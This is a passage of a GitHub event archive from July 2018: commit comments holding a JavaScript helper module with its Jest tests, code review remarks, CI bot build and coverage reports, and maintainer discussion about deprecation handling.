value && value.constructor;\r\n  const proto = (typeof ctor === 'function' && ctor.prototype) || Object.prototype;\r\n\r\n  return value === proto;\r\n};\r\n\r\n/**\r\n * Checks if `key` is a direct property of `object`.\r\n *\r\n * @param {Object} object The object to query.\r\n * @param {string} key The key to check.\r\n * @returns {boolean} Returns `true` if `key` exists, else `false`.\r\n */\r\nexport function has(object, key) {\r\n  return object != null && Object.hasOwnProperty.call(object, key);\r\n}\r\n\r\n/**\r\n * Checks if `value` is an empty object, collection, map, or set.\r\n *\r\n * Objects are considered empty if they have no own enumerable string keyed\r\n * properties.\r\n *\r\n * Array-like values such as `arguments` objects, arrays, buffers, strings, or\r\n * jQuery-like collections are considered empty if they have a `length` of `0`.\r\n * Similarly, maps and sets are considered empty if they have a `size` of `0`.\r\n *\r\n * @param {*} value The value to check.\r\n * @returns {boolean} Returns `true` if `value` is empty, else `false`.\r\n */\r\nexport function isEmpty(value) {\r\n  if (value === null) {\r\n    return true;\r\n  }\r\n\r\n  if (isArrayLike(value) || Array.isArray(value)) {\r\n    return !value.length;\r\n  }\r\n\r\n  if (isPrototype(value)) {\r\n    return !Object.keys(value).length;\r\n  }\r\n\r\n  for (const key in value) {\r\n    if (Object.hasOwnProperty.call(value, key)) {\r\n      return false;\r\n    }\r\n  }\r\n\r\n  return true;\r\n}\r\n\r\n/**\r\n * Gets the value at `path` of `object`. If the resolved value is\r\n * `undefined`, the `defaultValue` is returned in its place.\r\n *\r\n * @param {Object} object The object to query.\r\n * @param {Array|string} path The path of the property to get.\r\n * @param {*} [defaultValue] The value returned for `undefined` resolved values.\r\n * @returns {*} Returns the resolved value.\r\n */\r\nexport function get(object, path, defaultValue = undefined) {\r\n  const result = object == null ? undefined : object[path];\r\n  return result === undefined ? defaultValue : result;\r\n}\r\n```\r\n\r\nutils/helpers.test.js\r\n```\r\nimport {\r\n  has,\r\n  get,\r\n  isEmpty\r\n} from './helpers';\r\n\r\ndescribe('Helpers', () => {\r\n  describe('has()', () => {\r\n    it('should be defined', () => {\r\n      expect(has).toBeDefined();\r\n    });\r\n\r\n    it('should be a function', () => {\r\n      expect(has).toEqual(expect.any(Function));\r\n    });\r\n\r\n    it('should return `false` when the passed in object is `null`', () => {\r\n      expect(has(null)).toBe(false);\r\n    });\r\n\r\n    it('should return `false` when `key` is not an object prop', () => {\r\n      const source = { foo: '' };\r\n      const key = 'bar'; \r\n\r\n      expect(has(source, key)).toBe(false);\r\n    });\r\n\r\n    it('should return `true` when `key` exists as an object prop', () => {\r\n      const source = { foo: '' };\r\n      const key = 'foo'; \r\n\r\n      expect(has(source, key)).toBe(true);\r\n    });\r\n  });\r\n\r\n  describe('isEmpty()', () => {\r\n    it('should be defined', () => {\r\n      expect(isEmpty).toBeDefined();\r\n    });\r\n\r\n    it('should be a function', () => {\r\n      expect(isEmpty).toEqual(expect.any(Function));\r\n    });\r\n\r\n    it('should return `true` when the passed in argument is `null`', () => {\r\n      expect(isEmpty(null)).toBe(true);\r\n    });\r\n\r\n    describe('Array', () => {\r\n      it('should return `true` when the array length is 0', () => {\r\n        expect(isEmpty([])).toBe(true);\r\n      });\r\n\r\n      it('should return `false` when the array length greater than 0', () => {\r\n        expect(isEmpty([ 'foo', 'bar' ])).toBe(false);\r\n      });\r\n    });\r\n    \r\n    describe('String', () => {\r\n      it('should return `true` when the string length is 0', () => {\r\n        expect(isEmpty('')).toBe(true);\r\n      });\r\n\r\n      it('should return `false` when the string length greater than 0', () => {\r\n        expect(isEmpty('foo')).toBe(false);\r\n      });\r\n    });\r\n\r\n    describe('Object', () => {\r\n      it('should return `true` when the object is empty', () => {\r\n        expect(isEmpty({})).toBe(true);\r\n      });\r\n\r\n      it('should return `false` when the object has props', () => {\r\n        expect(isEmpty({ foo: '' })).toBe(false);\r\n      });\r\n    });\r\n\r\n    describe('Invalid values', () => {\r\n      it('should return `true` when the passed in arg is a `Number`', () => {\r\n        expect(isEmpty(1)).toBe(true);\r\n      });\r\n\r\n      it('should return `true` when the passed in arg is a `Boolean`', () => {\r\n        expect(isEmpty(false)).toBe(true);\r\n      });\r\n    });\r\n  });\r\n\r\n  describe('get()', () => {\r\n    it('should be defined', () => {\r\n      expect(get).toBeDefined();\r\n    });\r\n\r\n    it('should be a function', () => {\r\n      expect(get).toEqual(expect.any(Function));\r\n    });\r\n\r\n    it('should return `undefined` if the path does not exists', () => {\r\n      const source = {};\r\n      expect(get(source, 'foo')).toBe(undefined);\r\n    });\r\n\r\n    it('should return the expected value at `path`', () => {\r\n      const source = { foo: 'value' };\r\n      expect(get(source, 'foo')).toBe('value');\r\n    });\r\n\r\n    it('should return `defaultvalue` if `path` value is `undefined`', () => {\r\n      const source = { foo: undefined };\r\n      expect(get(source, 'foo', 'defaultValue')).toBe('defaultValue');\r\n    });\r\n  });\r\n});\r\n```"}},"created_at":"2018-07-23T20:22:17Z"}
{"id":"8006209512","type":"CommitCommentEvent","actor":{"login":"kaste"},"repo":{"name":"SublimeLinter/SublimeLinter-phpcs"},"payload":{"comment":{"id":29805511,"position":null,"line":null,"path":null,"commit_id":"e817cd4935345e25170e3dd45acc5ff4b03cc6fb","created_at":"2018-07-23T20:22:20Z","updated_at":"2018-07-23T20:22:20Z","author_association":"CONTRIBUTOR","body":"You did this for flake8, and it probably took us more time to handle the user issues than it takes to write the deprecation code. (Back then it was maybe hard to do deprecations, but now it's not.)\r\n\r\nI'm also really not in the business of frustrating users, regardless of spare or paid time."}},"created_at":"2018-07-23T20:22:20Z"}
{"id":"8006215130","type":"CommitCommentEvent","actor":{"login":"joshmh"},"repo":{"name":"lamassu/lamassu-machine"},"payload":{"comment":{"id":29805524,"position":null,"line":null,"path":null,"commit_id":"4122df6d23e94704c85ef3e1f400b8cb2068f05a","created_at":"2018-07-23T20:23:25Z","updated_at":"2018-07-23T20:23:25Z","author_association":"MEMBER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Enable lamp on scan ID](https://trello.com/c/bTonY62u/526-enable-lamp-on-scan-id)"}},"created_at":"2018-07-23T20:23:25Z"}
{"id":"8006215131","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":29805525,"position":null,"line":null,"path":null,"commit_id":"e87205ad97f30536f096e9858d33e8ad5d5ce220","created_at":"2018-07-23T20:23:25Z","updated_at":"2018-07-23T20:23:25Z","author_association":"NONE","body":"This shape of the OutpostRank mask is posting a +1.3 Elo result, so you're only missing 0.1 Elo point to make the SPRT[0..4] pass...\r\n\r\nMaybe tweaking the outpost values them could bring the needed 0.1 Elo points ?"}},"created_at":"2018-07-23T20:23:25Z"}
{"id":"8006251684","type":"CommitCommentEvent","actor":{"login":"mciul"},"repo":{"name":"i7/kerkerkruip"},"payload":{"comment":{"id":29805567,"position":null,"line":null,"path":null,"commit_id":"d15ccc0101006539a11c0f2f422f9d3dfcff5cce","created_at":"2018-07-23T20:30:41Z","updated_at":"2018-07-23T20:30:41Z","author_association":"CONTRIBUTOR","body":"Makes sense. Sounds like tweaking the test is the best solution. Let me know if you want to use it as an exercise in writing tests, or if you'd like me to do it. :)"}},"created_at":"2018-07-23T20:30:41Z"}
{"id":"8006256702","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29805574,"position":null,"line":null,"path":null,"commit_id":"105f4cffd988cc5b0e3deb71caed65c8c651f606","created_at":"2018-07-23T20:31:42Z","updated_at":"2018-07-23T20:31:42Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-shs-filt](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-shs-filt).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-shs-filt-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-23T20:31:42Z"}
{"id":"8006257693","type":"CommitCommentEvent","actor":{"login":"pvcraven"},"repo":{"name":"pvcraven/arcade"},"payload":{"comment":{"id":29805577,"position":9,"line":167,"path":"arcade/geometry.py","commit_id":"80cfc634ee40899bd31e15715a002d31fd7f5114","created_at":"2018-07-23T20:31:54Z","updated_at":"2018-07-23T20:31:54Z","author_association":"OWNER","body":"Issue #258. This just disables spatial hashing. What?????"}},"created_at":"2018-07-23T20:31:54Z"}
{"id":"8006258682","type":"CommitCommentEvent","actor":{"login":"amartens4178"},"repo":{"name":"amartens4178/Analyst_Toolbox"},"payload":{"comment":{"id":29805579,"position":null,"line":null,"path":null,"commit_id":"352fc094325a087a6932eedfac8f93ed2d2c9b2c","created_at":"2018-07-23T20:32:06Z","updated_at":"2018-07-23T20:32:06Z","author_association":"OWNER","body":"Fixing indentation in Git"}},"created_at":"2018-07-23T20:32:06Z"}
{"id":"8006259431","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29805580,"position":null,"line":null,"path":null,"commit_id":"a1cc074f5750d3cc12bc04be8cf8292bb09aff7f","created_at":"2018-07-23T20:32:14Z","updated_at":"2018-07-23T20:32:14Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-MacOS-10.9-clang: Tests Failed (1386 of 2946 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 625\n\nregression Test Summary\n * Passed: 622\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a1cc074f5750d3cc12bc04be8cf8292bb09aff7f-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a1cc074f5750d3cc12bc04be8cf8292bb09aff7f-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-47.05%25-red.png)</a> \n"}},"created_at":"2018-07-23T20:32:14Z"}
{"id":"8006261459","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29805586,"position":null,"line":null,"path":null,"commit_id":"3d5c3aeb77a21f11a901c47a960ce2dfc7e3aca0","created_at":"2018-07-23T20:32:38Z","updated_at":"2018-07-23T20:32:38Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.245`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*CircleCI*](https://circleci.com/gh/streamich/ci-scripts/245) :tada:"}},"created_at":"2018-07-23T20:32:38Z"}
{"id":"8006267777","type":"CommitCommentEvent","actor":{"login":"Ths2-9Y-LqJt6"},"repo":{"name":"melalj/topojson-map-generator"},"payload":{"comment":{"id":29805598,"position":65,"line":119,"path":"generate.sh","commit_id":"334c8732570db6dc146d1d014f11a68d4b6214a4","created_at":"2018-07-23T20:33:53Z","updated_at":"2018-07-23T20:33:53Z","author_association":"NONE","body":"This commit introduces a regression where MapTable expects ``countryIdentifierType`` to be ``\"name\"``, but now needs to be ``\"NAME\"``.  We should either keep this ``\"name\"`` or update MapTable to be case agnostic."}},"created_at":"2018-07-23T20:33:53Z"}
{"id":"8006268764","type":"CommitCommentEvent","actor":{"login":"martincostello"},"repo":{"name":"AnthonySteele/aws-sdk-net"},"payload":{"comment":{"id":29805600,"position":87,"line":137,"path":"sdk/src/Core/Amazon.Runtime/Credentials/_bcl+coreclr/DefaultInstanceProfileAWSCredentials.cs","commit_id":"c3d7ea604e65f0f2c6dcc762c38df0bb6eaf9231","created_at":"2018-07-23T20:34:06Z","updated_at":"2018-07-23T20:34:06Z","author_association":"NONE","body":"Do you need to check the return value to see if the exchange actually happened, and do anything differently, or does it not matter?"}},"created_at":"2018-07-23T20:34:06Z"}
{"id":"8006269162","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29805602,"position":null,"line":null,"path":null,"commit_id":"3d5c3aeb77a21f11a901c47a960ce2dfc7e3aca0","created_at":"2018-07-23T20:34:10Z","updated_at":"2018-07-23T20:34:10Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.371`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/407327416) :tada:"}},"created_at":"2018-07-23T20:34:10Z"}
{"id":"8006274875","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29805616,"position":null,"line":null,"path":null,"commit_id":"bd0396bab36d53b90b1caf3bb4f196dae425e780","created_at":"2018-07-23T20:35:15Z","updated_at":"2018-07-23T20:35:15Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-42](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-42).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-42-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-23T20:35:15Z"}
{"id":"8006276090","type":"CommitCommentEvent","actor":{"login":"martincostello"},"repo":{"name":"AnthonySteele/aws-sdk-net"},"payload":{"comment":{"id":29805620,"position":91,"line":141,"path":"sdk/src/Core/Amazon.Runtime/Credentials/_bcl+coreclr/DefaultInstanceProfileAWSCredentials.cs","commit_id":"c3d7ea604e65f0f2c6dcc762c38df0bb6eaf9231","created_at":"2018-07-23T20:35:29Z","updated_at":"2018-07-23T20:35:29Z","author_association":"NONE","body":"Is this even needed now? The value is set in the last line of the `catch` block, would that ever actually throw anything, and if it did, would we want to `null` out credentials that might have been successfully retrieved by another thread?"}},"created_at":"2018-07-23T20:35:29Z"}
{"id":"8006292886","type":"CommitCommentEvent","actor":{"login":"olevole"},"repo":{"name":"cbsd/cbsd-vmprofiles"},"payload":{"comment":{"id":29805666,"position":null,"line":null,"path":null,"commit_id":"e2c06ddf3763923ed8713f242727e413e0f39773","created_at":"2018-07-23T20:38:51Z","updated_at":"2018-07-23T20:38:51Z","author_association":"CONTRIBUTOR","body":"@mekanix FYI ^^ ))"}},"created_at":"2018-07-23T20:38:51Z"}
{"id":"8006294976","type":"CommitCommentEvent","actor":{"login":"Jerrynicki"},"repo":{"name":"nichtdasleo/LeOS9000-Bot"},"payload":{"comment":{"id":29805671,"position":null,"line":null,"path":null,"commit_id":"9965f805c14462b25f19989e6a177d8e4e593a0b","created_at":"2018-07-23T20:39:17Z","updated_at":"2018-07-23T20:39:17Z","author_association":"NONE","body":"wa"}},"created_at":"2018-07-23T20:39:17Z"}
{"id":"8006296777","type":"CommitCommentEvent","actor":{"login":"okiehsch"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29805672,"position":null,"line":null,"path":null,"commit_id":"4b615098ef838879e823591b08c073b919015080","created_at":"2018-07-23T20:39:39Z","updated_at":"2018-07-23T20:39:39Z","author_association":"CONTRIBUTOR","body":"https://github.com/uBlockOrigin/uAssets/issues/2989"}},"created_at":"2018-07-23T20:39:39Z"}
{"id":"8006299304","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29805681,"position":null,"line":null,"path":null,"commit_id":"85774f230b3d28f6b306e8e0a279a95af6cb82de","created_at":"2018-07-23T20:40:11Z","updated_at":"2018-07-23T20:40:11Z","author_association":"NONE","body":"159149473-Bug-in-surface-dot/cross-product-calculation-#6834 (lgu1234) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2324 of 2324 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-85774f230b3d28f6b306e8e0a279a95af6cb82de-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-85774f230b3d28f6b306e8e0a279a95af6cb82de-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-85774f230b3d28f6b306e8e0a279a95af6cb82de-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-23T20:40:11Z"}
{"id":"8006300909","type":"CommitCommentEvent","actor":{"login":"WestDiscGolf"},"repo":{"name":"aarondcoleman/Fitbit.NET"},"payload":{"comment":{"id":29805688,"position":null,"line":null,"path":null,"commit_id":"26b2fb61a8f197b81480a800abe9d366798aeb25","created_at":"2018-07-23T20:40:30Z","updated_at":"2018-07-23T20:40:30Z","author_association":"CONTRIBUTOR","body":"@aarondcoleman ah I see, makes sense :-)"}},"created_at":"2018-07-23T20:40:30Z"}
{"id":"8006301187","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29805690,"position":null,"line":null,"path":null,"commit_id":"e48a44583f927780d1729571bc1236df4fff9ff5","created_at":"2018-07-23T20:40:33Z","updated_at":"2018-07-23T20:40:33Z","author_association":"NONE","body":"## Global\n\n| Changed            |   Status |\n|:-------------------|---------:|\n| `coverage`         |     1.47 |\n| `metadata_passing` |    60    |\n| `metadata_total`   |    62    |\n\n## Units\n\n| Changed                             | Status   |\n|:------------------------------------|:---------|\n| `./data/tlg0014/tlg001/__cts__.xml` | New      |\n| `./data/tlg0014/tlg002/__cts__.xml` | New      |\n| `./data/tlg0014/tlg003/__cts__.xml` | New      |\n| `./data/tlg0014/tlg005/__cts__.xml` | New      |\n| `./data/tlg0014/tlg006/__cts__.xml` | New      |\n| `./data/tlg0014/tlg007/__cts__.xml` | New      |\n| `./data/tlg0014/tlg008/__cts__.xml` | New      |\n| `./data/tlg0014/tlg009/__cts__.xml` | New      |\n| `./data/tlg0014/tlg010/__cts__.xml` | New      |\n| `./data/tlg0014/tlg011/__cts__.xml` | New      |\n| `./data/tlg0014/tlg012/__cts__.xml` | New      |\n| `./data/tlg0014/tlg013/__cts__.xml` | New      |\n| `./data/tlg0014/tlg014/__cts__.xml` | New      |\n| `./data/tlg0014/tlg015/__cts__.xml` | New      |\n| `./data/tlg0014/tlg016/__cts__.xml` | New      |\n| `./data/tlg0014/tlg017/__cts__.xml` | New      |\n| `./data/tlg0014/tlg018/__cts__.xml` | New      |\n| `./data/tlg0014/tlg019/__cts__.xml` | New      |\n| `./data/tlg0014/tlg020/__cts__.xml` | New      |\n| `./data/tlg0014/tlg021/__cts__.xml` | New      |\n| `./data/tlg0014/tlg022/__cts__.xml` | New      |\n| `./data/tlg0014/tlg023/__cts__.xml` | New      |\n| `./data/tlg0014/tlg024/__cts__.xml` | New      |\n| `./data/tlg0014/tlg025/__cts__.xml` | New      |\n| `./data/tlg0014/tlg026/__cts__.xml` | New      |\n| `./data/tlg0014/tlg027/__cts__.xml` | New      |\n| `./data/tlg0014/tlg028/__cts__.xml` | New      |\n| `./data/tlg0014/tlg029/__cts__.xml` | New      |\n| `./data/tlg0014/tlg030/__cts__.xml` | New      |\n| `./data/tlg0014/tlg031/__cts__.xml` | New      |\n| `./data/tlg0014/tlg032/__cts__.xml` | New      |\n| `./data/tlg0014/tlg033/__cts__.xml` | New      |\n| `./data/tlg0014/tlg034/__cts__.xml` | New      |\n| `./data/tlg0014/tlg035/__cts__.xml` | New      |\n| `./data/tlg0014/tlg036/__cts__.xml` | New      |\n| `./data/tlg0014/tlg037/__cts__.xml` | New      |\n| `./data/tlg0014/tlg038/__cts__.xml` | New      |\n| `./data/tlg0014/tlg039/__cts__.xml` | New      |\n| `./data/tlg0014/tlg040/__cts__.xml` | New      |\n| `./data/tlg0014/tlg041/__cts__.xml` | New      |\n| `./data/tlg0014/tlg042/__cts__.xml` | New      |\n| `./data/tlg0014/tlg043/__cts__.xml` | New      |\n| `./data/tlg0014/tlg044/__cts__.xml` | New      |\n| `./data/tlg0014/tlg045/__cts__.xml` | New      |\n| `./data/tlg0014/tlg046/__cts__.xml` | New      |\n| `./data/tlg0014/tlg047/__cts__.xml` | New      |\n| `./data/tlg0014/tlg048/__cts__.xml` | New      |\n| `./data/tlg0014/tlg049/__cts__.xml` | New      |\n| `./data/tlg0014/tlg050/__cts__.xml` | New      |\n| `./data/tlg0014/tlg051/__cts__.xml` | New      |\n| `./data/tlg0014/tlg052/__cts__.xml` | New      |\n| `./data/tlg0014/tlg053/__cts__.xml` | New      |\n| `./data/tlg0014/tlg054/__cts__.xml` | New      |\n| `./data/tlg0014/tlg055/__cts__.xml` | New      |\n| `./data/tlg0014/tlg056/__cts__.xml` | New      |\n| `./data/tlg0014/tlg057/__cts__.xml` | New      |\n| `./data/tlg0014/tlg058/__cts__.xml` | New      |\n| `./data/tlg0014/tlg059/__cts__.xml` | New      |\n| `./data/tlg0014/tlg060/__cts__.xml` | New      |\n| `./data/tlg0014/tlg061/__cts__.xml` | New      |\n| `./data/tlg0014/tlg062/__cts__.xml` | New      |\n| `./data/tlg0014/tlg063/__cts__.xml` | New      |\n| `./data/tlg0014/tlg001/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg002/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg003/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg005/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg006/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg007/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg008/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg009/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg010/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg011/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg012/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg013/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg014/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg015/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg016/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg017/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg018/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg019/__cts__.xml` | Failing  |\n| `./data/tlg0014/tlg020/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg021/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg022/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg023/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg024/__cts__.xml` | Failing  |\n| `./data/tlg0014/tlg025/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg026/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg027/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg028/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg029/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg030/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg031/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg032/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg033/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg034/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg035/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg036/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg037/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg038/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg039/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg040/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg041/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg042/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg043/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg044/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg045/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg046/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg047/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg048/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg049/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg050/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg051/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg052/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg053/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg054/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg055/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg056/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg057/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg058/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg059/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg060/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg061/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg062/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg063/__cts__.xml` | Passing  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4487)*\n"}},"created_at":"2018-07-23T20:40:33Z"}
{"id":"8006301832","type":"CommitCommentEvent","actor":{"login":"pawosm-arm"},"repo":{"name":"flang-compiler/f18"},"payload":{"comment":{"id":29805692,"position":null,"line":null,"path":null,"commit_id":"1000717da820d87b330719034281a69eaf37bb89","created_at":"2018-07-23T20:40:42Z","updated_at":"2018-07-23T20:40:42Z","author_association":"NONE","body":"Linker complains and the linker is right. There's no libFortranParser.so on the list and only there Fortran::parser::QuoteCharacterLiteral is exported. I guess CMake specfile needs some attention.\r\n"}},"created_at":"2018-07-23T20:40:42Z"}
{"id":"8006302476","type":"CommitCommentEvent","actor":{"login":"thefraylachs5"},"repo":{"name":"thefraylachs5/codeexamples-java"},"payload":{"comment":{"id":29805694,"position":null,"line":null,"path":null,"commit_id":"d9a050ed1f5cad39bfabc57a1ee7acf3ccbbeb5d","created_at":"2018-07-23T20:40:50Z","updated_at":"2018-07-23T20:40:50Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-23T20:40:50Z"}
{"id":"8006303720","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29805696,"position":null,"line":null,"path":null,"commit_id":"4b1b8e57138a2618b28c2b52e66c16820b059a96","created_at":"2018-07-23T20:41:04Z","updated_at":"2018-07-23T20:41:04Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-514](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-514).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-514-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-23T20:41:04Z"}
{"id":"8006305007","type":"CommitCommentEvent","actor":{"login":"agodemar"},"repo":{"name":"Aircraft-Design-UniNa/jpad"},"payload":{"comment":{"id":29805703,"position":null,"line":null,"path":null,"commit_id":"74a9795ea05816dbb28a4816a4504c633698234e","created_at":"2018-07-23T20:41:19Z","updated_at":"2018-07-23T20:41:19Z","author_association":"CONTRIBUTOR","body":"Looks like the cutting is well done!"}},"created_at":"2018-07-23T20:41:19Z"}
{"id":"8006306508","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29805710,"position":null,"line":null,"path":null,"commit_id":"85774f230b3d28f6b306e8e0a279a95af6cb82de","created_at":"2018-07-23T20:41:37Z","updated_at":"2018-07-23T20:41:37Z","author_association":"NONE","body":"159149473-Bug-in-surface-dot/cross-product-calculation-#6834 (lgu1234) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-85774f230b3d28f6b306e8e0a279a95af6cb82de-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-23T20:41:37Z"}
{"id":"8006306805","type":"CommitCommentEvent","actor":{"login":"braver"},"repo":{"name":"SublimeLinter/SublimeLinter-phpcs"},"payload":{"comment":{"id":29805711,"position":null,"line":null,"path":null,"commit_id":"e817cd4935345e25170e3dd45acc5ff4b03cc6fb","created_at":"2018-07-23T20:41:40Z","updated_at":"2018-07-23T20:41:40Z","author_association":"MEMBER","body":"Well, like I said, just let me know you want to do the deprecation thing and I gladly get out of the way. I'm very user centered in my design decisions, but I'm definitely not a user friendly maintainer. I believe SL4 would never have happened if I were, but I push hard to get somewhere and sometimes I push too hard. \r\nMy primary concern is where this SL ecosystem is headed, so if you or someone else is motivated to make it a smooth ride that's totally awesome and ok with me. I didn't mean to frustrate you, if I did I'm sorry. "}},"created_at":"2018-07-23T20:41:40Z"}
